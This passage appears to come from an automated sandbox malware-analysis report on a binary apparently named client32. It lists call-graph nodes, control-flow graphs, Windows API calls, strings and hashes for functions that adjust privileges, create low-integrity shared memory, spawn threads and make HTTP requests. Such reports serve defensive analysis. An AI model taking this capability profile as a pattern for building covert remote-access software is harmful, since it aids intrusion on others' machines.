1116c965 89086->89087 89087->89082 89088 1116c96d DecodePointer 89087->89088 89089 1116c97e 89088->89089 89089->89082 89090 1116c982 89089->89090 89165 1116c548 66 API calls 4 library calls 89090->89165 89092 1116c98a GetCurrentThreadId 89092->89075 89097 11177e70 WideCharToMultiByte 89093->89097 89099 1116a3bc 89093->89099 89095 11177ea5 89098 1116ac39 __malloc_crt 66 API calls 89095->89098 89096 11177edd FreeEnvironmentStringsW 89096->89099 89097->89095 89097->89096 89100 11177eab 89098->89100 89106 11172029 GetStartupInfoW 89099->89106 89100->89096 89101 11177eb3 WideCharToMultiByte 89100->89101 89102 11177ec5 89101->89102 89103 11177ed1 FreeEnvironmentStringsW 89101->89103 89104 11163aa5 _free 66 API calls 89102->89104 89103->89099 89105 11177ecd 89104->89105 89105->89103 89107 1116ac7e __calloc_crt 66 API calls 89106->89107 89108 11172047 89107->89108 89108->89108 89110 1116ac7e __calloc_crt 66 API calls 89108->89110 89112 1116a3c6 89108->89112 89114 1117213c 89108->89114 89115 111721bc 89108->89115 89109 111721f2 GetStdHandle 89109->89115 89110->89108 89111 11172256 SetHandleCount 89111->89112 89112->89049 89119 11177d99 89112->89119 89113 11172204 GetFileType 89113->89115 89114->89115 89116 11172173 InitializeCriticalSectionAndSpinCount 89114->89116 89117 11172168 GetFileType 89114->89117 89115->89109 89115->89111 89115->89113 89118 1117222a InitializeCriticalSectionAndSpinCount 89115->89118 89116->89112 89116->89114 89117->89114 89117->89116 89118->89112 89118->89115 89120 11177db3 GetModuleFileNameA 89119->89120 89121 11177dae 89119->89121 89123 11177dda 89120->89123 89173 11171a45 94 API calls __setmbcp 89121->89173 89167 11177bff 89123->89167 89125 1116a3d6 89125->89053 89130 11177b23 89125->89130 89127 1116ac39 __malloc_crt 66 API calls 89128 11177e1c 89127->89128 89128->89125 89129 11177bff _parse_cmdline 76 API calls 89128->89129 89129->89125 89131 11177b2c 89130->89131 89134 11177b31 _strlen 89130->89134 89175 11171a45 94 API calls __setmbcp 89131->89175 89133 1116ac7e __calloc_crt 66 API calls 89139 11177b66 _strlen 89133->89139 89134->89133 89137 1116a3df 89134->89137 89135 11177bb5 89136 11163aa5 _free 66 API calls 89135->89136 89136->89137 89137->89053 89146 1116e46e 89137->89146 89138 1116ac7e __calloc_crt 66 API calls 89138->89139 89139->89135 89139->89137 89139->89138 89140 11177bdb 89139->89140 89142 1116cd5f _strcpy_s 66 API calls 89139->89142 89143 11177bf2 89139->89143 89141 11163aa5 _free 66 API calls 89140->89141 89141->89137 89142->89139 89144 1116ed72 __invoke_watson 10 API calls 89143->89144 89145 11177bfe 89144->89145 89147 1116e47c __IsNonwritableInCurrentImage 89146->89147 89176 1116d88b EncodePointer 89147->89176 89149 1116e49a __initterm_e 89151 1116e4bb __IsNonwritableInCurrentImage 89149->89151 89177 11163dd5 76 API calls __cinit 89149->89177 89151->89053 89152->89019 89153->89032 89154->89049 89155->89020 89156->89033 89157->89039 89158->89025 89159->89019 89160->89045 89161->89019 89162->89073 89163->89079 89164->89081 89165->89092 89166->89075 89168 11177c1e 89167->89168 89172 11177c8b 89168->89172 89174 11177590 76 API calls x_ismbbtype_l 89168->89174 89170 11177d89 89170->89125 89170->89127 89171 11177590 76 API calls __splitpath_helper 89171->89172 89172->89170 89172->89171 89173->89120 89174->89168 89175->89134 89176->89149 89177->89151 89179 11110474 EnterCriticalSection 89178->89179 89180 1111045f InitializeCriticalSection 89178->89180 89182 11110495 89179->89182 89180->89179 89181 111104c3 LeaveCriticalSection 89181->89065 89182->89181 89183 111103d0 ___DllMainCRTStartup 4 API calls 89182->89183 89183->89182 89184 11030b78 89185 11143630 267 API calls 89184->89185 89186 11030b86 89185->89186 89187 11143780 86 API calls 89186->89187 89188 11030bc3 89187->89188 89189 11030bd8 89188->89189 89190 11081e70 86 API calls 89188->89190 89191 110ed520 8 API calls 89189->89191 89190->89189 89192 11030bff 89191->89192 89193 11030c49 89192->89193 89252 110ed5d0 81 API calls 2 library calls 89192->89252 89197 11143780 86 API calls 89193->89197 89195 11030c14 89253 110ed5d0 81 API calls 2 library calls 89195->89253 89199 11030c60 89197->89199 89198 11030c2b 89198->89193 89200 11146fe0 19 API calls 89198->89200 89201 111101b0 std::_Mutex::_Mutex 265 API calls 89199->89201 89200->89193 89202 11030c6f 89201->89202 89203 11030c90 89202->89203 89204 11088b30 268 API calls 89202->89204 89205 1108a880 267 API calls 89203->89205 89204->89203 89206 11030ca3 OpenMutexA 89205->89206 89207 11030cc3 CreateMutexA 89206->89207 89208 11030dda CloseHandle 89206->89208 89209 11030ce3 89207->89209 89245 1108a980 89208->89245 89211 111101b0 std::_Mutex::_Mutex 265 API calls 89209->89211 89213 11030cf8 89211->89213 89212 11030df0 89215 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 89212->89215 89214 11030d1b 89213->89214 89216 11061710 293 API calls 89213->89216 89235 110161e0 LoadLibraryA 89214->89235 89218 11031773 89215->89218 89216->89214 89219 11030d2d 89220 11145c70 std::_Mutex::_Mutex 90 API calls 89219->89220 89221 11030d3c 89220->89221 89222 11030d49 89221->89222 89223 11030d5c 89221->89223 89236 111466b0 89222->89236 89225 11030d66 GetProcAddress 89223->89225 89226 11030d50 89223->89226 89225->89226 89227 11030d80 SetLastError 89225->89227 89228 110287a0 47 API calls 89226->89228 89227->89226 89229 11030d8d 89228->89229 89254 11009370 431 API calls std::_Mutex::_Mutex 89229->89254 89231 11030d9c 89232 11030db0 WaitForSingleObject 89231->89232 89232->89232 89233 11030dc2 CloseHandle 89232->89233 89233->89208 89234 11030dd3 FreeLibrary 89233->89234 89234->89208 89235->89219 89237 11145c70 std::_Mutex::_Mutex 90 API calls 89236->89237 89238 111466c2 89237->89238 89239 11146700 89238->89239 89240 111466c9 LoadLibraryA 89238->89240 89239->89226 89241 111466fa 89240->89241 89242 111466db GetProcAddress 89240->89242 89241->89226 89243 111466f3 FreeLibrary 89242->89243 89244 111466eb 89242->89244 89243->89241 89244->89243 89246 1108aa27 89245->89246 89250 1108a9ba std::ios_base::_Ios_base_dtor 89245->89250 89247 1108aa2e DeleteCriticalSection 89246->89247 89255 1115c2d0 89247->89255 89248 1108a9ce CloseHandle 89248->89250 89250->89246 89250->89248 89251 1108aa54 std::ios_base::_Ios_base_dtor 89251->89212 89252->89195 89253->89198 89254->89231 89258 1115c2e4 89255->89258 89256 1115c2e8 89256->89251 89258->89256 89259 1115c040 67 API calls 2 library calls 89258->89259 89259->89258

                                                                              Executed Functions

                                                                              Function 1109E5B0 Relevance: 100.3, APIs: 42, Strings: 15, Instructions: 501filethreadmemoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 774 1109e5b0-1109e612 call 1109dda0 777 1109e618-1109e63b call 1109d860 774->777 778 1109ec30 774->778 784 1109e641-1109e655 LocalAlloc 777->784 785 1109e7a4-1109e7a6 777->785 779 1109ec32-1109ec4d call 11162bb7 778->779 787 1109e65b-1109e68d InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 784->787 788 1109ec25-1109ec2b call 1109d8f0 784->788 786 1109e736-1109e75b CreateFileMappingA 785->786 792 1109e7a8-1109e7bb GetLastError 786->792 793 1109e75d-1109e77d GetLastError call 110d6c20 786->793 789 1109e71a-1109e730 787->789 790 1109e693-1109e6be call 1109d7d0 call 1109d810 787->790 788->778 789->786 820 1109e709-1109e711 790->820 821 1109e6c0-1109e6f6 GetSecurityDescriptorSacl 790->821 795 1109e7bd 792->795 796 1109e7c2-1109e7d9 MapViewOfFile 792->796 806 1109e788-1109e790 793->806 807 1109e77f-1109e786 LocalFree 793->807 795->796 799 1109e7db-1109e7f6 call 110d6c20 796->799 800 1109e817-1109e81f 796->800 823 1109e7f8-1109e7f9 LocalFree 799->823 824 1109e7fb-1109e803 799->824 804 1109e8c1-1109e8d3 800->804 805 1109e825-1109e83e GetModuleFileNameA 800->805 812 1109e919-1109e932 call 11162be0 GetTickCount 804->812 813 1109e8d5-1109e8d8 804->813 814 1109e8dd-1109e8f8 call 110d6c20 805->814 815 1109e844-1109e84d 805->815 808 1109e792-1109e793 LocalFree 806->808 809 1109e795-1109e79f 806->809 807->806 808->809 819 1109ec1e-1109ec20 call 1109dce0 809->819 839 1109e934-1109e939 812->839 816 1109e9bf-1109ea23 GetCurrentProcessId GetModuleFileNameA call 1109dc30 813->816 837 1109e8fa-1109e8fb LocalFree 814->837 838 1109e8fd-1109e905 814->838 815->814 817 1109e853-1109e856 815->817 841 1109ea2b-1109ea42 CreateEventA 816->841 842 1109ea25 816->842 826 1109e899-1109e8bc call 110d6c20 call 1109dce0 817->826 827 1109e858-1109e85c 817->827 819->788 820->789 831 1109e713-1109e714 FreeLibrary 820->831 821->820 830 1109e6f8-1109e703 SetSecurityDescriptorSacl 821->830 823->824 833 1109e808-1109e812 824->833 834 1109e805-1109e806 LocalFree 824->834 826->804 827->826 836 1109e85e-1109e869 827->836 830->820 831->789 833->819 834->833 843 1109e870-1109e874 836->843 837->838 844 1109e90a-1109e914 838->844 845 1109e907-1109e908 LocalFree 838->845 846 1109e93b-1109e94a 839->846 847 1109e94c 839->847 851 1109ea44-1109ea63 GetLastError * 2 call 110d6c20 841->851 852 1109ea66-1109ea6e 841->852 842->841 849 1109e890-1109e892 843->849 850 1109e876-1109e878 843->850 844->819 845->844 846->839 846->847 853 1109e94e-1109e954 847->853 858 1109e895-1109e897 849->858 855 1109e87a-1109e880 850->855 856 1109e88c-1109e88e 850->856 851->852 859 1109ea70 852->859 860 1109ea76-1109ea87 CreateEventA 852->860 861 1109e965-1109e9bd 853->861 862 1109e956-1109e963 853->862 855->849 863 1109e882-1109e88a 855->863 856->858 858->814 858->826 859->860 865 1109ea89-1109eaa8 GetLastError * 2 call 110d6c20 860->865 866 1109eaab-1109eab3 860->866 861->816 862->853 862->861 863->843 863->856 865->866 868 1109eabb-1109eacd CreateEventA 866->868 869 1109eab5 866->869 870 1109eacf-1109eaee GetLastError * 2 call 110d6c20 868->870 871 1109eaf1-1109eaf9 868->871 869->868 870->871 874 1109eafb 871->874 875 1109eb01-1109eb12 CreateEventA 871->875 874->875 877 1109eb34-1109eb42 875->877 878 1109eb14-1109eb31 GetLastError * 2 call 110d6c20 875->878 880 1109eb44-1109eb45 LocalFree 877->880 881 1109eb47-1109eb4f 877->881 878->877 880->881 883 1109eb51-1109eb52 LocalFree 881->883 884 1109eb54-1109eb5d 881->884 883->884 885 1109eb63-1109eb66 884->885 886 1109ec07-1109ec19 call 110d6c20 884->886 885->886 887 1109eb6c-1109eb6f 885->887 886->819 887->886 889 1109eb75-1109eb78 887->889 889->886 891 1109eb7e-1109eb81 889->891 892 1109eb8c-1109eba8 CreateThread 891->892 893 1109eb83-1109eb89 GetCurrentThreadId 891->893 894 1109ebaa-1109ebb4 892->894 895 1109ebb6-1109ebc0 892->895 893->892 894->819 896 1109ebda-1109ec05 SetEvent call 110d6c20 call 1109d8f0 895->896 897 1109ebc2-1109ebd8 ResetEvent * 3 895->897 896->779 897->896
                                                                              APIs
                                                                                • Part of subcall function 1109D860: GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,EE49F673,00080000,00000000,?), ref: 1109D88D
                                                                                • Part of subcall function 1109D860: OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
                                                                                • Part of subcall function 1109D860: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
                                                                                • Part of subcall function 1109D860: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9
                                                                              • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,EE49F673,00080000,00000000,?), ref: 1109E645
                                                                              • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E65E
                                                                              • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E669
                                                                              • GetVersionExA.KERNEL32(?), ref: 1109E680
                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E6EE
                                                                              • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E703
                                                                              • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E714
                                                                              • CreateFileMappingA.KERNEL32(000000FF,11030703,00000004,00000000,?,?), ref: 1109E750
                                                                              • GetLastError.KERNEL32 ref: 1109E75D
                                                                              • LocalFree.KERNEL32(?), ref: 1109E786
                                                                              • LocalFree.KERNEL32(?), ref: 1109E793
                                                                              • GetLastError.KERNEL32 ref: 1109E7B0
                                                                              • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E7CE
                                                                              • LocalFree.KERNEL32(?), ref: 1109E7F9
                                                                              • LocalFree.KERNEL32(?), ref: 1109E806
                                                                                • Part of subcall function 1109D7D0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109E69E), ref: 1109D7D8
                                                                                • Part of subcall function 1109D810: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D824
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E832
                                                                              • LocalFree.KERNEL32(?), ref: 1109E8FB
                                                                              • LocalFree.KERNEL32(?), ref: 1109E908
                                                                              • _memset.LIBCMT ref: 1109E920
                                                                              • GetTickCount.KERNEL32 ref: 1109E928
                                                                              • GetCurrentProcessId.KERNEL32 ref: 1109E9D4
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E9EF
                                                                              • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109EA3B
                                                                              • GetLastError.KERNEL32 ref: 1109EA44
                                                                              • GetLastError.KERNEL32(00000000), ref: 1109EA4B
                                                                              • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EA80
                                                                              • GetLastError.KERNEL32 ref: 1109EA89
                                                                              • GetLastError.KERNEL32(00000000), ref: 1109EA90
                                                                              • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109EAC6
                                                                              • GetLastError.KERNEL32 ref: 1109EACF
                                                                              • GetLastError.KERNEL32(00000000), ref: 1109EAD6
                                                                              • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EB0B
                                                                              • GetLastError.KERNEL32 ref: 1109EB1A
                                                                              • GetLastError.KERNEL32(00000000), ref: 1109EB1D
                                                                              • LocalFree.KERNEL32(?), ref: 1109EB45
                                                                              • LocalFree.KERNEL32(?), ref: 1109EB52
                                                                              • GetCurrentThreadId.KERNEL32 ref: 1109EB83
                                                                              • CreateThread.KERNEL32(00000000,00002000,Function_0009E140,00000000,00000000,00000030), ref: 1109EB9D
                                                                              • ResetEvent.KERNEL32(?), ref: 1109EBCC
                                                                              • ResetEvent.KERNEL32(?), ref: 1109EBD2
                                                                              • ResetEvent.KERNEL32(?), ref: 1109EBD8
                                                                              • SetEvent.KERNEL32(?), ref: 1109EBDE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                              • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                              • API String ID: 3291243470-2792520954
                                                                              • Opcode ID: 5f128e5d137d7e61479c73dee0859362bd36eaaf37b2cb873371865b9cdea2a1
                                                                              • Instruction ID: a3fd055aacadca8d823d44ca49761fd5d24e706f53ed4dbc48f97bf713fa71f6
                                                                              • Opcode Fuzzy Hash: 5f128e5d137d7e61479c73dee0859362bd36eaaf37b2cb873371865b9cdea2a1
                                                                              • Instruction Fuzzy Hash: A612B2B5E0026D9FEB24DF60CDD4EAAB7BAFB88304F0049A9E51D97640D671AD84CF50
                                                                              Function 11029BB0 Relevance: 91.5, APIs: 40, Strings: 12, Instructions: 534libraryloadernetworkCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 902 11029bb0-11029c3e LoadLibraryA 903 11029c41-11029c46 902->903 904 11029c48-11029c4b 903->904 905 11029c4d-11029c50 903->905 906 11029c65-11029c6a 904->906 907 11029c52-11029c55 905->907 908 11029c57-11029c62 905->908 909 11029c99-11029ca5 906->909 910 11029c6c-11029c71 906->910 907->906 908->906 911 11029d4a-11029d4d 909->911 912 11029cab-11029cc3 call 11163a11 909->912 913 11029c73-11029c8a GetProcAddress 910->913 914 11029c8c-11029c8f 910->914 916 11029d68-11029d80 InternetOpenA 911->916 917 11029d4f-11029d66 GetProcAddress 911->917 923 11029ce4-11029cf0 912->923 924 11029cc5-11029cde GetProcAddress 912->924 913->914 918 11029c91-11029c93 SetLastError 913->918 914->909 921 11029da4-11029db0 call 11163aa5 916->921 917->916 920 11029d99-11029da1 SetLastError 917->920 918->909 920->921 930 11029db6-11029de7 call 11142e60 call 11165250 921->930 931 1102a02a-1102a034 921->931 929 11029cf2-11029cfb GetLastError 923->929 932 11029d11-11029d13 923->932 924->923 926 11029d82-11029d8a SetLastError 924->926 926->929 929->932 933 11029cfd-11029d0f call 11163aa5 call 11163a11 929->933 952 11029de9-11029dec 930->952 953 11029def-11029e04 call 11081d30 * 2 930->953 931->903 934 1102a03a 931->934 936 11029d30-11029d3c 932->936 937 11029d15-11029d2e GetProcAddress 932->937 933->932 940 1102a04c-1102a04f 934->940 936->911 954 11029d3e-11029d47 936->954 937->936 941 11029d8f-11029d97 SetLastError 937->941 943 1102a051-1102a056 940->943 944 1102a05b-1102a05e 940->944 941->911 948 1102a1bf-1102a1c7 943->948 949 1102a060-1102a065 944->949 950 1102a06a 944->950 958 1102a1d0-1102a1e3 948->958 959 1102a1c9-1102a1ca FreeLibrary 948->959 955 1102a18f-1102a194 949->955 956 1102a06d-1102a075 950->956 952->953 978 11029e06-11029e0a 953->978 979 11029e0d-11029e19 953->979 954->911 963 1102a196-1102a1ad GetProcAddress 955->963 964 1102a1af-1102a1b5 955->964 961 1102a077-1102a08e GetProcAddress 956->961 962 1102a094-1102a0a2 InternetQueryDataAvailable 956->962 959->958 961->962 966 1102a14e-1102a150 SetLastError 961->966 967 1102a156-1102a15d 962->967 968 1102a0a8-1102a0ad 962->968 963->964 969 1102a1b7-1102a1b9 SetLastError 963->969 964->948 966->967 970 1102a16c-1102a18d call 11027f00 * 2 967->970 968->970 972 1102a0b3-1102a0ef call 11110230 call 11027eb0 968->972 969->948 970->955 995 1102a101-1102a103 972->995 996 1102a0f1-1102a0f4 972->996 978->979 982 11029e44-11029e49 979->982 983 11029e1b-11029e1d 979->983 985 11029e4b-11029e5c GetProcAddress 982->985 986 11029e5e-11029e75 InternetConnectA 982->986 988 11029e34-11029e3a 983->988 989 11029e1f-11029e32 GetProcAddress 983->989 985->986 991 11029ea1-11029eac SetLastError 985->991 992 1102a017-1102a027 call 11162777 986->992 993 11029e7b-11029e7e 986->993 988->982 989->988 994 11029e3c-11029e3e SetLastError 989->994 991->992 992->931 1000 11029e80-11029e82 993->1000 1001 11029eb9-11029ec1 993->1001 994->982 998 1102a105 995->998 999 1102a10c-1102a111 995->999 996->995 997 1102a0f6-1102a0fa 996->997 997->995 1004 1102a0fc 997->1004 998->999 1005 1102a113-1102a129 call 110d12e0 999->1005 1006 1102a12c-1102a12e 999->1006 1007 11029e84-11029e97 GetProcAddress 1000->1007 1008 11029e99-11029e9f 1000->1008 1010 11029ec3-11029ed7 GetProcAddress 1001->1010 1011 11029ed9-11029ef4 HttpOpenRequestA 1001->1011 1004->995 1005->1006 1014 1102a130-1102a132 1006->1014 1015 1102a134-1102a145 call 11162777 1006->1015 1007->1008 1013 11029eb1-11029eb3 SetLastError 1007->1013 1008->1001 1010->1011 1016 11029ef6-11029efe SetLastError 1010->1016 1017 11029f01-11029f04 1011->1017 1013->1001 1014->1015 1022 1102a15f-1102a169 call 11162777 1014->1022 1015->970 1031 1102a147-1102a149 1015->1031 1016->1017 1018 1102a012-1102a015 1017->1018 1019 11029f0a-11029f0f 1017->1019 1018->992 1027 1102a03c-1102a049 call 11162777 1018->1027 1025 11029f11-11029f28 GetProcAddress 1019->1025 1026 11029f2a-11029f36 1019->1026 1022->970 1025->1026 1030 11029f38-11029f40 SetLastError 1025->1030 1035 11029f42-11029f5b GetLastError 1026->1035 1027->940 1030->1035 1031->956 1036 11029f76-11029f8b 1035->1036 1037 11029f5d-11029f74 GetProcAddress 1035->1037 1040 11029f95-11029fa3 GetLastError 1036->1040 1037->1036 1038 11029f8d-11029f8f SetLastError 1037->1038 1038->1040 1041 11029fa5-11029faa 1040->1041 1042 11029fac-11029fb8 GetDesktopWindow 1040->1042 1041->1042 1045 1102a002-1102a007 1041->1045 1043 11029fd3-11029fef 1042->1043 1044 11029fba-11029fd1 GetProcAddress 1042->1044 1043->1018 1049 11029ff1 1043->1049 1044->1043 1046 11029ff6-1102a000 SetLastError 1044->1046 1045->1018 1047 1102a009-1102a00f 1045->1047 1046->1018 1047->1018 1049->1017
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(WinInet.dll,EE49F673,759223A0,?,00000000), ref: 11029BE5
                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029C7F
                                                                              • SetLastError.KERNEL32(00000078), ref: 11029C93
                                                                              • _malloc.LIBCMT ref: 11029CB7
                                                                              • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029CD1
                                                                              • GetLastError.KERNEL32 ref: 11029CF2
                                                                              • _free.LIBCMT ref: 11029CFE
                                                                              • _malloc.LIBCMT ref: 11029D07
                                                                              • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029D21
                                                                              • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 11029D5B
                                                                              • InternetOpenA.WININET(11195264,?,?,000000FF,00000000), ref: 11029D7A
                                                                              • SetLastError.KERNEL32(00000078), ref: 11029D84
                                                                              • SetLastError.KERNEL32(00000078), ref: 11029D91
                                                                              • SetLastError.KERNEL32(00000078), ref: 11029D9B
                                                                              • _free.LIBCMT ref: 11029DA5
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E25
                                                                              • SetLastError.KERNEL32(00000078), ref: 11029E3E
                                                                              • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029E51
                                                                              • InternetConnectA.WININET(000000FF,1119A6C0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 11029E6E
                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E8A
                                                                              • SetLastError.KERNEL32(00000078), ref: 11029EA3
                                                                              • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029EC9
                                                                              • HttpOpenRequestA.WININET(?,GET,1119A6D8,00000000,00000000,00000000,8040F000,00000000), ref: 11029EEF
                                                                              • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 11029F1D
                                                                              • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 1102A083
                                                                              • InternetQueryDataAvailable.WININET(1117FC4B,1102CCC1,00000000,00000000), ref: 1102A09E
                                                                              • SetLastError.KERNEL32(00000078), ref: 1102A150
                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102A1A2
                                                                              • SetLastError.KERNEL32(00000078), ref: 1102A1B9
                                                                              • FreeLibrary.KERNEL32(?), ref: 1102A1CA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$ErrorLast$Internet$FreeLibraryOpen_free_malloc$AvailableConnectDataHeapHttpLoadQueryRequest
                                                                              • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                              • API String ID: 579908884-913974648
                                                                              • Opcode ID: 672cd097590bfd03c9fe4a36dbc9c03aeb2e34a222513bbefa7f0796f77ae97c
                                                                              • Instruction ID: fedf281c9ee5d08c3a8f43e513d3e5c088d5a5ed6dab1fd82504b865b87691ba
                                                                              • Opcode Fuzzy Hash: 672cd097590bfd03c9fe4a36dbc9c03aeb2e34a222513bbefa7f0796f77ae97c
                                                                              • Instruction Fuzzy Hash: 8012AC70D40229DBEB11DFE5CC88AAEFBF8FF88754F604169E425A7600EB745980CB60
                                                                              Function 6EF07030 Relevance: 89.7, APIs: 21, Strings: 30, Instructions: 406threadlibrarysynchronizationCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
